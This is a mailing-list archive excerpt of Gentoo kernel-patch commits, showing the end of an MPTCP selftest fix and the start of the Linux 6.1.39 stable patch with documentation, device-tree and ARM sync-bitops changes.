+ 			rta->rta_type = MPTCP_PM_ATTR_TOKEN;
+ 			rta->rta_len = RTA_LENGTH(4);
+@@ -710,7 +710,7 @@ int announce_addr(int fd, int pm_family, int argc, char *argv[])
+ 			if (++arg >= argc)
+ 				error(1, 0, " missing token value");
+ 
+-			token = atoi(argv[arg]);
++			token = strtoul(argv[arg], NULL, 10);
+ 		} else
+ 			error(1, 0, "unknown keyword %s", argv[arg]);
+ 	}
+@@ -1347,7 +1347,7 @@ int set_flags(int fd, int pm_family, int argc, char *argv[])
+ 				error(1, 0, " missing token value");
+ 
+ 			/* token */
+-			token = atoi(argv[arg]);
++			token = strtoul(argv[arg], NULL, 10);
+ 		} else if (!strcmp(argv[arg], "flags")) {
+ 			char *tok, *str;
+ 
+diff --git a/tools/testing/selftests/net/mptcp/userspace_pm.sh b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+index eb0f4f6afebd3..cb6c28d401293 100755
+--- a/tools/testing/selftests/net/mptcp/userspace_pm.sh
++++ b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+@@ -387,6 +387,7 @@ test_remove()
+ 		stdbuf -o0 -e0 printf "[OK]\n"
+ 	else
+ 		stdbuf -o0 -e0 printf "[FAIL]\n"
++		exit 1
+ 	fi
+ 
+ 	# RM_ADDR using an invalid addr id should result in no action
+@@ -401,6 +402,7 @@ test_remove()
+ 		stdbuf -o0 -e0 printf "[OK]\n"
+ 	else
+ 		stdbuf -o0 -e0 printf "[FAIL]\n"
++		exit 1
+ 	fi
+ 
+ 	# RM_ADDR from the client to server machine
+@@ -847,7 +849,7 @@ test_prio()
+ 	local count
+ 
+ 	# Send MP_PRIO signal from client to server machine
+-	ip netns exec "$ns2" ./pm_nl_ctl set 10.0.1.2 port "$client4_port" flags backup token "$client4_token" rip 10.0.1.1 rport "$server4_port"
++	ip netns exec "$ns2" ./pm_nl_ctl set 10.0.1.2 port "$client4_port" flags backup token "$client4_token" rip 10.0.1.1 rport "$app4_port"
+ 	sleep 0.5
+ 
+ 	# Check TX


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-19 17:05 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-19 17:05 UTC (permalink / raw
  To: gentoo-commits

commit:     e542692b39596ae034479ec0e3aed41946c129ac
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jul 19 17:05:00 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jul 19 17:05:00 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e542692b

Linux patch 6.1.39

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 1038_linux-6.1.39.patch | 23193 ++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 23193 insertions(+)

diff --git a/1038_linux-6.1.39.patch b/1038_linux-6.1.39.patch
new file mode 100644
index 00000000..1739bab8
--- /dev/null
+++ b/1038_linux-6.1.39.patch
@@ -0,0 +1,23193 @@
+diff --git a/Documentation/ABI/testing/sysfs-driver-eud b/Documentation/ABI/testing/sysfs-driver-eud
+index 83f3872182a40..2bab0db2d2f0f 100644
+--- a/Documentation/ABI/testing/sysfs-driver-eud
++++ b/Documentation/ABI/testing/sysfs-driver-eud
+@@ -1,4 +1,4 @@
+-What:		/sys/bus/platform/drivers/eud/.../enable
++What:		/sys/bus/platform/drivers/qcom_eud/.../enable
+ Date:           February 2022
+ Contact:        Souradeep Chowdhury <quic_schowdhu@quicinc.com>
+ Description:
+diff --git a/Documentation/devicetree/bindings/power/reset/qcom,pon.yaml b/Documentation/devicetree/bindings/power/reset/qcom,pon.yaml
+index d96170eecbd22..0b1eca734d3b1 100644
+--- a/Documentation/devicetree/bindings/power/reset/qcom,pon.yaml
++++ b/Documentation/devicetree/bindings/power/reset/qcom,pon.yaml
+@@ -56,7 +56,6 @@ required:
+ unevaluatedProperties: false
+ 
+ allOf:
+-  - $ref: reboot-mode.yaml#
+   - if:
+       properties:
+         compatible:
+@@ -66,6 +65,9 @@ allOf:
+               - qcom,pms405-pon
+               - qcom,pm8998-pon
+     then:
++      allOf:
++        - $ref: reboot-mode.yaml#
++
+       properties:
+         reg:
+           maxItems: 1
+diff --git a/Documentation/fault-injection/provoke-crashes.rst b/Documentation/fault-injection/provoke-crashes.rst
+index 3abe842256139..1f087e502ca6d 100644
+--- a/Documentation/fault-injection/provoke-crashes.rst
++++ b/Documentation/fault-injection/provoke-crashes.rst
+@@ -29,7 +29,7 @@ recur_count
+ cpoint_name
+ 	Where in the kernel to trigger the action. It can be
+ 	one of INT_HARDWARE_ENTRY, INT_HW_IRQ_EN, INT_TASKLET_ENTRY,
+-	FS_DEVRW, MEM_SWAPOUT, TIMERADD, SCSI_QUEUE_RQ, or DIRECT.
++	FS_SUBMIT_BH, MEM_SWAPOUT, TIMERADD, SCSI_QUEUE_RQ, or DIRECT.
+ 
+ cpoint_type
+ 	Indicates the action to be taken on hitting the crash point.
+diff --git a/Documentation/filesystems/autofs-mount-control.rst b/Documentation/filesystems/autofs-mount-control.rst
+index bf4b511cdbe85..b5a379d25c40b 100644
+--- a/Documentation/filesystems/autofs-mount-control.rst
++++ b/Documentation/filesystems/autofs-mount-control.rst
+@@ -196,7 +196,7 @@ information and return operation results::
+ 		    struct args_ismountpoint	ismountpoint;
+ 	    };
+ 
+-	    char path[0];
++	    char path[];
+     };
+ 
+ The ioctlfd field is a mount point file descriptor of an autofs mount
+diff --git a/Documentation/filesystems/autofs.rst b/Documentation/filesystems/autofs.rst
+index 4f490278d22fc..3b6e38e646cd8 100644
+--- a/Documentation/filesystems/autofs.rst
++++ b/Documentation/filesystems/autofs.rst
+@@ -467,7 +467,7 @@ Each ioctl is passed a pointer to an `autofs_dev_ioctl` structure::
+ 			struct args_ismountpoint	ismountpoint;
+ 		};
+ 
+-                char path[0];
++                char path[];
+         };
+ 
+ For the **OPEN_MOUNT** and **IS_MOUNTPOINT** commands, the target
+diff --git a/Documentation/filesystems/directory-locking.rst b/Documentation/filesystems/directory-locking.rst
+index 504ba940c36c1..dccd61c7c5c3b 100644
+--- a/Documentation/filesystems/directory-locking.rst
++++ b/Documentation/filesystems/directory-locking.rst
+@@ -22,12 +22,11 @@ exclusive.
+ 3) object removal.  Locking rules: caller locks parent, finds victim,
+ locks victim and calls the method.  Locks are exclusive.
+ 
+-4) rename() that is _not_ cross-directory.  Locking rules: caller locks
+-the parent and finds source and target.  In case of exchange (with
+-RENAME_EXCHANGE in flags argument) lock both.  In any case,
+-if the target already exists, lock it.  If the source is a non-directory,
+-lock it.  If we need to lock both, lock them in inode pointer order.
+-Then call the method.  All locks are exclusive.
++4) rename() that is _not_ cross-directory.  Locking rules: caller locks the
++parent and finds source and target.  We lock both (provided they exist).  If we
++need to lock two inodes of different type (dir vs non-dir), we lock directory
++first.  If we need to lock two inodes of the same type, lock them in inode
++pointer order.  Then call the method.  All locks are exclusive.
+ NB: we might get away with locking the source (and target in exchange
+ case) shared.
+ 
+@@ -44,15 +43,17 @@ All locks are exclusive.
+ rules:
+ 
+ 	* lock the filesystem
+-	* lock parents in "ancestors first" order.
++	* lock parents in "ancestors first" order. If one is not ancestor of
++	  the other, lock them in inode pointer order.
+ 	* find source and target.
+ 	* if old parent is equal to or is a descendent of target
+ 	  fail with -ENOTEMPTY
+ 	* if new parent is equal to or is a descendent of source
+ 	  fail with -ELOOP
+-	* If it's an exchange, lock both the source and the target.
+-	* If the target exists, lock it.  If the source is a non-directory,
+-	  lock it.  If we need to lock both, do so in inode pointer order.
++	* Lock both the source and the target provided they exist. If we
++	  need to lock two inodes of different type (dir vs non-dir), we lock
++	  the directory first. If we need to lock two inodes of the same type,
++	  lock them in inode pointer order.
+ 	* call the method.
+ 
+ All ->i_rwsem are taken exclusive.  Again, we might get away with locking
+@@ -66,8 +67,9 @@ If no directory is its own ancestor, the scheme above is deadlock-free.
+ 
+ Proof:
+ 
+-	First of all, at any moment we have a partial ordering of the
+-	objects - A < B iff A is an ancestor of B.
++	First of all, at any moment we have a linear ordering of the
++	objects - A < B iff (A is an ancestor of B) or (B is not an ancestor
++        of A and ptr(A) < ptr(B)).
+ 
+ 	That ordering can change.  However, the following is true:
+ 
+diff --git a/Documentation/networking/af_xdp.rst b/Documentation/networking/af_xdp.rst
+index 60b217b436be6..5b77b9e5ac7e6 100644
+--- a/Documentation/networking/af_xdp.rst
++++ b/Documentation/networking/af_xdp.rst
+@@ -433,6 +433,15 @@ start N bytes into the buffer leaving the first N bytes for the
+ application to use. The final option is the flags field, but it will
+ be dealt with in separate sections for each UMEM flag.
+ 
++SO_BINDTODEVICE setsockopt
++--------------------------
++
++This is a generic SOL_SOCKET option that can be used to tie AF_XDP
++socket to a particular network interface.  It is useful when a socket
++is created by a privileged process and passed to a non-privileged one.
++Once the option is set, kernel will refuse attempts to bind that socket
++to a different interface.  Updating the value requires CAP_NET_RAW.
++
+ XDP_STATISTICS getsockopt
+ -------------------------
+ 
+diff --git a/Makefile b/Makefile
+index 57c891b8b13cc..f0619754c29a5 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 38
++SUBLEVEL = 39
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arc/include/asm/linkage.h b/arch/arc/include/asm/linkage.h
+index c9434ff3aa4ce..8a3fb71e9cfad 100644
+--- a/arch/arc/include/asm/linkage.h
++++ b/arch/arc/include/asm/linkage.h
+@@ -8,6 +8,10 @@
+ 
+ #include <asm/dwarf.h>
+ 
++#define ASM_NL		 `	/* use '`' to mark new line in macro */
++#define __ALIGN		.align 4
++#define __ALIGN_STR	__stringify(__ALIGN)
++
+ #ifdef __ASSEMBLY__
+ 
+ .macro ST2 e, o, off
+@@ -28,10 +32,6 @@
+ #endif
+ .endm
+ 
+-#define ASM_NL		 `	/* use '`' to mark new line in macro */
+-#define __ALIGN		.align 4
+-#define __ALIGN_STR	__stringify(__ALIGN)
+-
+ /* annotation for data we want in DCCM - if enabled in .config */
+ .macro ARCFP_DATA nm
+ #ifdef CONFIG_ARC_HAS_DCCM
+diff --git a/arch/arm/boot/dts/bcm53015-meraki-mr26.dts b/arch/arm/boot/dts/bcm53015-meraki-mr26.dts
+index 14f58033efeb9..ca2266b936ee2 100644
+--- a/arch/arm/boot/dts/bcm53015-meraki-mr26.dts
++++ b/arch/arm/boot/dts/bcm53015-meraki-mr26.dts
+@@ -128,7 +128,7 @@
+ 
+ 			fixed-link {
+ 				speed = <1000>;
+-				duplex-full;
++				full-duplex;
+ 			};
+ 		};
+ 	};
+diff --git a/arch/arm/boot/dts/bcm53016-meraki-mr32.dts b/arch/arm/boot/dts/bcm53016-meraki-mr32.dts
+index e678bc03d8165..008de8ee2584a 100644
+--- a/arch/arm/boot/dts/bcm53016-meraki-mr32.dts
++++ b/arch/arm/boot/dts/bcm53016-meraki-mr32.dts
+@@ -187,7 +187,7 @@
+ 
+ 			fixed-link {
+ 				speed = <1000>;
+-				duplex-full;
++				full-duplex;
+ 			};
+ 		};
+ 	};
+diff --git a/arch/arm/boot/dts/bcm5301x.dtsi b/arch/arm/boot/dts/bcm5301x.dtsi
+index 5fc1b847f4aa5..787a0dd8216b7 100644
+--- a/arch/arm/boot/dts/bcm5301x.dtsi
++++ b/arch/arm/boot/dts/bcm5301x.dtsi
+@@ -542,7 +542,6 @@
+ 				  "spi_lr_session_done",
+ 				  "spi_lr_overread";
+ 		clocks = <&iprocmed>;
+-		clock-names = "iprocmed";
+ 		num-cs = <2>;
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/iwg20d-q7-common.dtsi b/arch/arm/boot/dts/iwg20d-q7-common.dtsi
+index 03caea6fc6ffa..4351c5a02fa59 100644
+--- a/arch/arm/boot/dts/iwg20d-q7-common.dtsi
++++ b/arch/arm/boot/dts/iwg20d-q7-common.dtsi
+@@ -49,7 +49,7 @@
+ 	lcd_backlight: backlight {
+ 		compatible = "pwm-backlight";
+ 
+-		pwms = <&pwm3 0 5000000 0>;
++		pwms = <&pwm3 0 5000000>;
+ 		brightness-levels = <0 4 8 16 32 64 128 255>;
+ 		default-brightness-level = <7>;
+ 		enable-gpios = <&gpio5 14 GPIO_ACTIVE_HIGH>;
+diff --git a/arch/arm/boot/dts/lan966x-kontron-kswitch-d10-mmt.dtsi b/arch/arm/boot/dts/lan966x-kontron-kswitch-d10-mmt.dtsi
+index 0097e72e3fb22..f4df4cc1dfa5e 100644
+--- a/arch/arm/boot/dts/lan966x-kontron-kswitch-d10-mmt.dtsi
++++ b/arch/arm/boot/dts/lan966x-kontron-kswitch-d10-mmt.dtsi
+@@ -18,6 +18,8 @@
+ 
+ 	gpio-restart {
+ 		compatible = "gpio-restart";
++		pinctrl-0 = <&reset_pins>;
++		pinctrl-names = "default";
+ 		gpios = <&gpio 56 GPIO_ACTIVE_LOW>;
+ 		priority = <200>;
+ 	};
+@@ -39,7 +41,7 @@
+ 	status = "okay";
+ 
+ 	spi3: spi@400 {
+-		pinctrl-0 = <&fc3_b_pins>;
++		pinctrl-0 = <&fc3_b_pins>, <&spi3_cs_pins>;
+ 		pinctrl-names = "default";
+ 		status = "okay";
+ 		cs-gpios = <&gpio 46 GPIO_ACTIVE_LOW>;
+@@ -59,6 +61,12 @@
+ 		function = "miim_c";
+ 	};
+ 
++	reset_pins: reset-pins {
++		/* SYS_RST# */
++		pins = "GPIO_56";
++		function = "gpio";
++	};
++
+ 	sgpio_a_pins: sgpio-a-pins {
+ 		/* SCK, D0, D1 */
+ 		pins = "GPIO_32", "GPIO_33", "GPIO_34";
+@@ -71,6 +79,12 @@
+ 		function = "sgpio_b";
+ 	};
+ 
++	spi3_cs_pins: spi3-cs-pins {
++		/* CS# */
++		pins = "GPIO_46";
++		function = "gpio";
++	};
++
+ 	usart0_pins: usart0-pins {
+ 		/* RXD, TXD */
+ 		pins = "GPIO_25", "GPIO_26";
+diff --git a/arch/arm/boot/dts/meson8.dtsi b/arch/arm/boot/dts/meson8.dtsi
+index 0f8bac8bac8bb..f9da7faa2186b 100644
+--- a/arch/arm/boot/dts/meson8.dtsi
++++ b/arch/arm/boot/dts/meson8.dtsi
+@@ -749,13 +749,13 @@
+ 
+ &uart_B {
+ 	compatible = "amlogic,meson8-uart";
+-	clocks = <&xtal>, <&clkc CLKID_UART0>, <&clkc CLKID_CLK81>;
++	clocks = <&xtal>, <&clkc CLKID_UART1>, <&clkc CLKID_CLK81>;
+ 	clock-names = "xtal", "pclk", "baud";
+ };
+ 
+ &uart_C {
+ 	compatible = "amlogic,meson8-uart";
+-	clocks = <&xtal>, <&clkc CLKID_UART0>, <&clkc CLKID_CLK81>;
++	clocks = <&xtal>, <&clkc CLKID_UART2>, <&clkc CLKID_CLK81>;
+ 	clock-names = "xtal", "pclk", "baud";
+ };
+ 
+diff --git a/arch/arm/boot/dts/meson8b.dtsi b/arch/arm/boot/dts/meson8b.dtsi
+index cf9c04a61ba3c..d3e0f085904db 100644
+--- a/arch/arm/boot/dts/meson8b.dtsi
++++ b/arch/arm/boot/dts/meson8b.dtsi
+@@ -737,13 +737,13 @@
+ 
+ &uart_B {
+ 	compatible = "amlogic,meson8b-uart";
+-	clocks = <&xtal>, <&clkc CLKID_UART0>, <&clkc CLKID_CLK81>;
++	clocks = <&xtal>, <&clkc CLKID_UART1>, <&clkc CLKID_CLK81>;
+ 	clock-names = "xtal", "pclk", "baud";
+ };
+ 
+ &uart_C {
+ 	compatible = "amlogic,meson8b-uart";
+-	clocks = <&xtal>, <&clkc CLKID_UART0>, <&clkc CLKID_CLK81>;
++	clocks = <&xtal>, <&clkc CLKID_UART2>, <&clkc CLKID_CLK81>;
+ 	clock-names = "xtal", "pclk", "baud";
+ };
+ 
+diff --git a/arch/arm/boot/dts/omap3-gta04a5one.dts b/arch/arm/boot/dts/omap3-gta04a5one.dts
+index 9db9fe67cd63b..95df45cc70c09 100644
+--- a/arch/arm/boot/dts/omap3-gta04a5one.dts
++++ b/arch/arm/boot/dts/omap3-gta04a5one.dts
+@@ -5,9 +5,11 @@
+ 
+ #include "omap3-gta04a5.dts"
+ 
+-&omap3_pmx_core {
++/ {
+ 	model = "Goldelico GTA04A5/Letux 2804 with OneNAND";
++};
+ 
++&omap3_pmx_core {
+ 	gpmc_pins: pinmux_gpmc_pins {
+ 		pinctrl-single,pins = <
+ 
+diff --git a/arch/arm/boot/dts/qcom-apq8074-dragonboard.dts b/arch/arm/boot/dts/qcom-apq8074-dragonboard.dts
+index 91716298ec5ed..be1ab7eff8ff4 100644
+--- a/arch/arm/boot/dts/qcom-apq8074-dragonboard.dts
++++ b/arch/arm/boot/dts/qcom-apq8074-dragonboard.dts
+@@ -23,6 +23,10 @@
+ 	status = "okay";
+ };
+ 
++&blsp2_dma {
++	qcom,controlled-remotely;
++};
++
+ &blsp2_i2c5 {
+ 	status = "okay";
+ 	clock-frequency = <200000>;
+diff --git a/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1-c1.dts b/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1-c1.dts
+index 79b0c6318e527..0993f840d1fc7 100644
+--- a/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1-c1.dts
++++ b/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1-c1.dts
+@@ -11,9 +11,9 @@
+ 		dma-controller@7984000 {
+ 			status = "okay";
+ 		};
+-
+-		qpic-nand@79b0000 {
+-			status = "okay";
+-		};
+ 	};
+ };
++
++&nand {
++	status = "okay";
++};
+diff --git a/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1.dtsi b/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1.dtsi
+index a63b3778636d4..468ebc40d2ad3 100644
+--- a/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1.dtsi
+@@ -102,10 +102,10 @@
+ 			status = "okay";
+ 			perst-gpios = <&tlmm 38 GPIO_ACTIVE_LOW>;
+ 		};
+-
+-		qpic-nand@79b0000 {
+-			pinctrl-0 = <&nand_pins>;
+-			pinctrl-names = "default";
+-		};
+ 	};
+ };
++
++&nand {
++	pinctrl-0 = <&nand_pins>;
++	pinctrl-names = "default";
++};
+diff --git a/arch/arm/boot/dts/qcom-ipq4019-ap.dk07.1.dtsi b/arch/arm/boot/dts/qcom-ipq4019-ap.dk07.1.dtsi
+index 0107f552f5204..7ef635997efa4 100644
+--- a/arch/arm/boot/dts/qcom-ipq4019-ap.dk07.1.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq4019-ap.dk07.1.dtsi
+@@ -65,11 +65,11 @@
+ 		dma-controller@7984000 {
+ 			status = "okay";
+ 		};
+-
+-		qpic-nand@79b0000 {
+-			pinctrl-0 = <&nand_pins>;
+-			pinctrl-names = "default";
+-			status = "okay";
+-		};
+ 	};
+ };
++
++&nand {
++	pinctrl-0 = <&nand_pins>;
++	pinctrl-names = "default";
++	status = "okay";
++};
+diff --git a/arch/arm/boot/dts/qcom-msm8974.dtsi b/arch/arm/boot/dts/qcom-msm8974.dtsi
+index 7a9be0acf3f5a..c4b2e9ac24940 100644
+--- a/arch/arm/boot/dts/qcom-msm8974.dtsi
++++ b/arch/arm/boot/dts/qcom-msm8974.dtsi
+@@ -300,7 +300,7 @@
+ 			qcom,ipc = <&apcs 8 0>;
+ 			qcom,smd-edge = <15>;
+ 
+-			rpm_requests: rpm_requests {
++			rpm_requests: rpm-requests {
+ 				compatible = "qcom,rpm-msm8974";
+ 				qcom,smd-channels = "rpm_requests";
+ 
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcom-pdk2.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcom-pdk2.dtsi
+index 5f586f024060f..38f46c2c83aa6 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcom-pdk2.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcom-pdk2.dtsi
+@@ -137,10 +137,13 @@
+ 
+ 	sound {
+ 		compatible = "audio-graph-card";
+-		routing =
+-			"MIC_IN", "Capture",
+-			"Capture", "Mic Bias",
+-			"Playback", "HP_OUT";
++		widgets = "Headphone", "Headphone Jack",
++			  "Line", "Line In Jack",
++			  "Microphone", "Microphone Jack";
++		routing = "Headphone Jack", "HP_OUT",
++			  "LINE_IN", "Line In Jack",
++			  "MIC_IN", "Microphone Jack",
++			  "Microphone Jack", "Mic Bias";
+ 		dais = <&sai2a_port &sai2b_port>;
+ 		status = "okay";
+ 	};
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
+index b6957cbdeff5f..f068e4fcc404f 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
+@@ -88,7 +88,7 @@
+ 
+ 	sound {
+ 		compatible = "audio-graph-card";
+-		label = "STM32MP1-AV96-HDMI";
++		label = "STM32-AV96-HDMI";
+ 		dais = <&sai2a_port>;
+ 		status = "okay";
+ 	};
+@@ -322,6 +322,12 @@
+ 			};
+ 		};
+ 	};
++
++	dh_mac_eeprom: eeprom@53 {
++		compatible = "atmel,24c02";
++		reg = <0x53>;
++		pagesize = <16>;
++	};
+ };
+ 
+ &ltdc {
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi
+index 27477bb219ded..bb4ac6c13cbd3 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi
+@@ -192,6 +192,12 @@
+ 		reg = <0x50>;
+ 		pagesize = <16>;
+ 	};
++
++	dh_mac_eeprom: eeprom@53 {
++		compatible = "atmel,24c02";
++		reg = <0x53>;
++		pagesize = <16>;
++	};
+ };
+ 
+ &sdmmc1 {	/* MicroSD */
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi
+index bb40fb46da81d..bba19f21e5277 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi
+@@ -213,12 +213,6 @@
+ 			status = "disabled";
+ 		};
+ 	};
+-
+-	eeprom@53 {
+-		compatible = "atmel,24c02";
+-		reg = <0x53>;
+-		pagesize = <16>;
+-	};
+ };
+ 
+ &ipcc {
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi b/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi
+index 8b48d3c89a047..fdc48536e97d1 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi
+@@ -438,7 +438,7 @@
+ 	i2s2_port: port {
+ 		i2s2_endpoint: endpoint {
+ 			remote-endpoint = <&sii9022_tx_endpoint>;
+-			format = "i2s";
++			dai-format = "i2s";
+ 			mclk-fs = <256>;
+ 		};
+ 	};
+diff --git a/arch/arm/include/asm/assembler.h b/arch/arm/include/asm/assembler.h
+index 90fbe4a3f9c84..84912b19cac85 100644
+--- a/arch/arm/include/asm/assembler.h
++++ b/arch/arm/include/asm/assembler.h
+@@ -402,6 +402,23 @@ ALT_UP_B(.L0_\@)
+ #endif
+ 	.endm
+ 
++/*
++ * Raw SMP data memory barrier
++ */
++	.macro	__smp_dmb mode
++#if __LINUX_ARM_ARCH__ >= 7
++	.ifeqs "\mode","arm"
++	dmb	ish
++	.else
++	W(dmb)	ish
++	.endif
++#elif __LINUX_ARM_ARCH__ == 6
++	mcr	p15, 0, r0, c7, c10, 5	@ dmb
++#else
++	.error "Incompatible SMP platform"
++#endif
++	.endm
++
+ #if defined(CONFIG_CPU_V7M)
+ 	/*
+ 	 * setmode is used to assert to be in svc mode during boot. For v7-M
+diff --git a/arch/arm/include/asm/sync_bitops.h b/arch/arm/include/asm/sync_bitops.h
+index 6f5d627c44a3c..f46b3c570f92e 100644
+--- a/arch/arm/include/asm/sync_bitops.h
++++ b/arch/arm/include/asm/sync_bitops.h
+@@ -14,14 +14,35 @@
+  * ops which are SMP safe even on a UP kernel.
+  */
+ 
++/*
++ * Unordered
++ */
++
+ #define sync_set_bit(nr, p)		_set_bit(nr, p)
+ #define sync_clear_bit(nr, p)		_clear_bit(nr, p)
+ #define sync_change_bit(nr, p)		_change_bit(nr, p)
+-#define sync_test_and_set_bit(nr, p)	_test_and_set_bit(nr, p)
+-#define sync_test_and_clear_bit(nr, p)	_test_and_clear_bit(nr, p)
+-#define sync_test_and_change_bit(nr, p)	_test_and_change_bit(nr, p)
+ #define sync_test_bit(nr, addr)		test_bit(nr, addr)
+-#define arch_sync_cmpxchg		arch_cmpxchg
+ 
++/*
++ * Fully ordered
++ */
++
++int _sync_test_and_set_bit(int nr, volatile unsigned long * p);
++#define sync_test_and_set_bit(nr, p)	_sync_test_and_set_bit(nr, p)
++
++int _sync_test_and_clear_bit(int nr, volatile unsigned long * p);
++#define sync_test_and_clear_bit(nr, p)	_sync_test_and_clear_bit(nr, p)
++
++int _sync_test_and_change_bit(int nr, volatile unsigned long * p);
++#define sync_test_and_change_bit(nr, p)	_sync_test_and_change_bit(nr, p)
++
++#define arch_sync_cmpxchg(ptr, old, new)				\
++({									\
++	__typeof__(*(ptr)) __ret;					\
++	__smp_mb__before_atomic();					\
++	__ret = arch_cmpxchg_relaxed((ptr), (old), (new));		\
++	__smp_mb__after_atomic();					\
++	__ret;								\
++})
+ 
+ #endif
+diff --git a/arch/arm/lib/bitops.h b/arch/arm/lib/bitops.h
+index 95bd359912889..f069d1b2318e6 100644
+--- a/arch/arm/lib/bitops.h
++++ b/arch/arm/lib/bitops.h
+@@ -28,7 +28,7 @@ UNWIND(	.fnend		)
+ ENDPROC(\name		)
+ 	.endm
+ 
+-	.macro	testop, name, instr, store
++	.macro	__testop, name, instr, store, barrier
+ ENTRY(	\name		)
+ UNWIND(	.fnstart	)
+ 	ands	ip, r1, #3
+@@ -38,7 +38,7 @@ UNWIND(	.fnstart	)
+ 	mov	r0, r0, lsr #5
+ 	add	r1, r1, r0, lsl #2	@ Get word offset
+ 	mov	r3, r2, lsl r3		@ create mask
+-	smp_dmb
++	\barrier
+ #if __LINUX_ARM_ARCH__ >= 7 && defined(CONFIG_SMP)
+ 	.arch_extension	mp
+ 	ALT_SMP(W(pldw)	[r1])
+@@ -50,13 +50,21 @@ UNWIND(	.fnstart	)
+ 	strex	ip, r2, [r1]
+ 	cmp	ip, #0
+ 	bne	1b
+-	smp_dmb
++	\barrier
+ 	cmp	r0, #0
+ 	movne	r0, #1
+ 2:	bx	lr
+ UNWIND(	.fnend		)
+ ENDPROC(\name		)
+ 	.endm
++
++	.macro	testop, name, instr, store
++	__testop \name, \instr, \store, smp_dmb
++	.endm
++
++	.macro	sync_testop, name, instr, store
++	__testop \name, \instr, \store, __smp_dmb
++	.endm
+ #else
+ 	.macro	bitop, name, instr
+ ENTRY(	\name		)
+diff --git a/arch/arm/lib/testchangebit.S b/arch/arm/lib/testchangebit.S
+index 4ebecc67e6e04..f13fe9bc2399a 100644
+--- a/arch/arm/lib/testchangebit.S
++++ b/arch/arm/lib/testchangebit.S
+@@ -10,3 +10,7 @@
+                 .text
+ 
+ testop	_test_and_change_bit, eor, str
++
++#if __LINUX_ARM_ARCH__ >= 6
++sync_testop	_sync_test_and_change_bit, eor, str
++#endif
+diff --git a/arch/arm/lib/testclearbit.S b/arch/arm/lib/testclearbit.S
+index 009afa0f5b4a7..4d2c5ca620ebf 100644
+--- a/arch/arm/lib/testclearbit.S
++++ b/arch/arm/lib/testclearbit.S
+@@ -10,3 +10,7 @@
+                 .text
+ 
+ testop	_test_and_clear_bit, bicne, strne
++
++#if __LINUX_ARM_ARCH__ >= 6
++sync_testop	_sync_test_and_clear_bit, bicne, strne
++#endif
+diff --git a/arch/arm/lib/testsetbit.S b/arch/arm/lib/testsetbit.S
+index f3192e55acc87..649dbab65d8d0 100644
+--- a/arch/arm/lib/testsetbit.S
++++ b/arch/arm/lib/testsetbit.S
+@@ -10,3 +10,7 @@
+                 .text
+ 
+ testop	_test_and_set_bit, orreq, streq
++
++#if __LINUX_ARM_ARCH__ >= 6
++sync_testop	_sync_test_and_set_bit, orreq, streq
++#endif
+diff --git a/arch/arm/mach-ep93xx/timer-ep93xx.c b/arch/arm/mach-ep93xx/timer-ep93xx.c
+index dd4b164d18317..a9efa7bc2fa12 100644
+--- a/arch/arm/mach-ep93xx/timer-ep93xx.c
++++ b/arch/arm/mach-ep93xx/timer-ep93xx.c
+@@ -9,6 +9,7 @@
+ #include <linux/io.h>
+ #include <asm/mach/time.h>
+ #include "soc.h"
++#include "platform.h"
+ 
+ /*************************************************************************
+  * Timer handling for EP93xx
+@@ -60,7 +61,7 @@ static u64 notrace ep93xx_read_sched_clock(void)
+ 	return ret;
+ }
+ 
+-u64 ep93xx_clocksource_read(struct clocksource *c)
++static u64 ep93xx_clocksource_read(struct clocksource *c)
+ {
+ 	u64 ret;
+ 
+diff --git a/arch/arm/mach-omap2/board-generic.c b/arch/arm/mach-omap2/board-generic.c
+index 1610c567a6a3a..10d2f078e4a8e 100644
